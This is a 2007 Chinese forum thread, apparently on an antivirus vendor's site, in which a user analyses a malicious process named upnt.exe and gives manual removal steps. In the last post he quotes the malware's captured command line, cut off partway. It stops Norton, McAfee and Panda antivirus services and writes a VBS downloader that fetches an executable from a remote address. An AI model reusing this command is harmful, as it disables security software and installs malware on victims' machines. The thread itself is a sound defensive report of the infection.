cboy - 2007-5-16 13:40:00
以前此进程名为:dservices.exe,现在更名为upnt.exe,文件路径在:C:\WINNT\system32\dllcache,加入系统服务中,并且禁用“停止”服务按钮,中止Norton杀毒软件服务,结事此进程后会自己重启,出来一图形窗口,窗口几秒后自动消失,此程序一运行,不停向外发送数据,机器速度变慢,疑为通过网络传播,以前进和名为dservices.exe时,杀毒软件可以杀,现在无法查出,流氓软件清理工具也不识别此进程。解决方法:禁用此服务,结束此进程,强行删除此文件,或者安全模式下清理,清理完毕后,加装防火墙。附图片如下
附件:
8352822007516133003.jpg
cboy - 2007-5-16 13:45:00
cboy - 2007-5-16 13:48:00
cboy - 2007-5-16 13:52:00
指日可待 - 2007-5-16 15:43:00
帮忙顶个,如果是线程插入到其他进程中运行的?
cboy - 2007-5-16 15:47:00
找到了它是如何运行的:通过cmd.exe执行下面的命令,通过网络传播的
-----------------------------------------------------------
CommandLine = cmd /c net stop "Norton AntiVirus Auto Protect Service"&net stop Mcshield&net stop "Panda Antivirus"&echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.vbs&echo ExeURL = "http://192.168.0.150:15036/84785_mssql.exe">>c:\1.vbs&echo LocalPath = "c:\upnt.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs€�C
© 2000 - 2026 Rising Corp. Ltd.